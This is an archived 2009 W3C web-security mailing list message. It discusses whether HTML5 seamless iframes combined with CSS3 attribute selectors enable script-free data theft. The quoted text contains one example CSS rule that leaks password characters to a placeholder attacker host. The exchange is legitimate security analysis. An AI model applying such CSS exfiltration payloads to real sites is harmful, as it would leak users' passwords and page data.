W3C home > Mailing lists > Public > public-web-security@w3.org > December 2009

Re: Seamless iframes + CSS3 selectors = bad idea

From: Maciej Stachowiak <mjs@apple.com>
Date: Sat, 05 Dec 2009 22:27:30 -0800
Cc: sird@rckc.at, public-web-security@w3.org
Message-id: <BEA89597-66C3-40E5-BC10-B3F41B40E737@apple.com>
To: Ian Hickson <ian@hixie.ch>

On Dec 5, 2009, at 10:16 PM, Ian Hickson wrote:

> On Fri, 4 Dec 2009, Eduardo Vela wrote:
>>
>> I sincerely understand why people want seamless iframes on HTML5.. I
>> mean, I've been there.. but sometimes the better way to do  
>> something is
>> not to do it.
>>
>> The perfect example are seamless iframes (defined in html5) and CSS3
>> selectors.
>>
>> What I see with those awesome CSS3 selectors such as:
>>
>> input[type=password][value^=a]{background:url("//attacker/ 
>> password_starts_with=a")}
>>
>> create a new type of XSS attacks, and those are purely CSS based XSS
>> attacks.. without JS.. that will allow an attacker to read arbitrary
>> files from the page WITHOUT the need of JS.
>
> How is the attacker inserting CSS into the page, in this scenario?
>
> I agree that if an attacker can insert CSS into a victim page, that
> numerous information retrieval attacks are possible (though not  
> currently
> a password attack, as Maciej mentioned). However, this has long been
> known, it doesn't seem to be a new problem.

I think the attack is that you can inject CSS in an unwilling victim  
page by embedding it in a seamless iframe (since CSS rules are  
supposed to cascade into the iframe's contained document per HTML5).  
However, since the contents of a seamless iframe have to be same- 
origin, the embedding page could just script it directly. Thus, I'm  
not sure what the vulnerability is. It's not safe to put a page on a  
given origin that contains data which must not be leaked to other  
pages on that origin. If anyone does that, then violating their  
mistaken assumption is not XSS. It does seem slightly novel that one  
page in a given origin could extract data from another on that same  
origin even if JavaScript is disabled.

Regards,
Maciej
Received on Sunday, 6 December 2009 06:28:04 GMT

This archive was generated by hypermail 2.2.0+W3C-0.50 : Sunday, 19 December 2010 00:16:01 GMT